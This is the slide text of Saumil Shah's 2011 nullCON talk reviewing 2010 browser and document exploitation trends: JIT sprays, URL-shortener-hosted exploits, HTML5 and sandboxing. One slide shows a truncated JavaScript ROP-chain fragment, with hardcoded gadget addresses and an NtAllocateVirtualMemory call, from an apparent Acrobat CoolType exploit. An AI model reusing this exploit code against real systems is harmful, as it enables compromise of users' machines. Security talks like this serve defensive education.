2010: A Net Odyssey
Saumil Shah
nullCON Goa
26.02.2011
This talk looks back at 2010 - a very important year in the area of Internet Security.

  • Flash Sprays, JIT sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • JNLP IE8 exploit on Win7, Adobe Cooltype exploit on Win7, IE8 CSS exploit on Win7
  • Sandboxing isn't the solution.

    1. 2010: A Net Odyssey
       Saumil Shah
       nullCON Goa
       26.02.2011
    2. Welcome to NullCON!
       nullcon.net | null.co.in
    3. # who am i
       Saumil Shah - CEO Net-Square
       saumilshah
       Hacker (written in Hindi, Gujarati and English)
       Many languages, one goal
    4. What did we learn from ?
    7. ATTACK SURFACE 2010-2011
       5
    8. 5
       33% MORE!
    9. 5
       With JIT! Fights DEP, ASLR!
    10. 5
        Worldwide coverage,
        Hides your tracks.
    11. 5
        ...as never seen before!
    12. 5
        GUARANTEED!!
        Fresh new bugs,
        Present on most computers
    13. "The amount of intelligence in the world is constant.
        And the population is increasing."
    17. It's SPLOIT TIME!
    18. Jedi A/V Tricks
        These are not the sploitz you're looking for.
    19. Obfuscated Javascript decoded without using eval, document.write, etc.
        See no eval!
        Acrobat CoolType exploit
        IE+JNLP exploit
    20. High Tech vs. Low Tech
        Acrobat CoolType exploit
        Return Oriented Programming code
        Escape-From-PDF
        No fancy tricks
    21. This iz what ?
    22. I'm an evil Javascript
        I'm an innocent image
    23. function packv(n){
          var s=new Number(n).toString(16);
          while(s.length<8)s="0"+s;
          return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))
        }
        var addressof=new Array();
        addressof["ropnop"]=0x6d81bdf0;
        addressof["xchg_eax_esp_ret"]=0x6d81bdef;
        addressof["pop_eax_ret"]=0x6d906744;
        addressof["pop_ecx_ret"]=0x6d81cd57;
        addressof["mov_peax_ecx_ret"]=0x6d979720;
        addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
        addressof["mov_pecx_eax_ret"]=0x6d8eee01;
        addressof["inc_eax_ret"]=0x6d838f54;
        addressof["add_eax_4_ret"]=0x00000000;
        addressof["call_peax_ret"]=0x6d8aec31;
        addressof["add_esp_24_ret"]=0x00000000;
        addressof["popad_ret"]=0x6d82a8a1;
        addressof["call_peax"]=0x6d802597;
        function call_ntallocatevirtualmemory(baseptr,size,callnum){
          var ropnop=packv(addressof["ropnop"]);
          var pop_eax_ret=packv(addressof["pop_eax_ret"]);
          var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
          var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
          var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
          var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
          var call_peax_ret=packv(addressof["call_peax_ret"]);
          var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
          var popad_ret=packv(addressof["popad_ret"]);
          var retval=""
        <CANVAS>
    27. W3C
        "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
    28. Application Delivery
        Authentication
        Statefulness
        Data Typing
        Non-mutable
    29. Application Delivery
        The Web at present
        Authentication
        Statefulness
        Data Typing
        Non-mutable
        HTTP
        HTML
        AJAX
        Flash
        Sandbox
        HTML5
        Anti-XSS
        WAF
        Silverlight
        Web sockets
    30. The FUTURE is HERE!
    31. No longer Science Fiction
    33. Keep on patching!
    34. I can haz sandbox
        I Also Can!
    35. The Solution?
        HTML 8.0
        HTTP 2.0
        Browser Security Model
        Self Contained Apps
    36. n|u
        dwitiya
        kthxbai
        saumil@net-square.com
        slideshare.net/saumilshah
        www.net-square.com
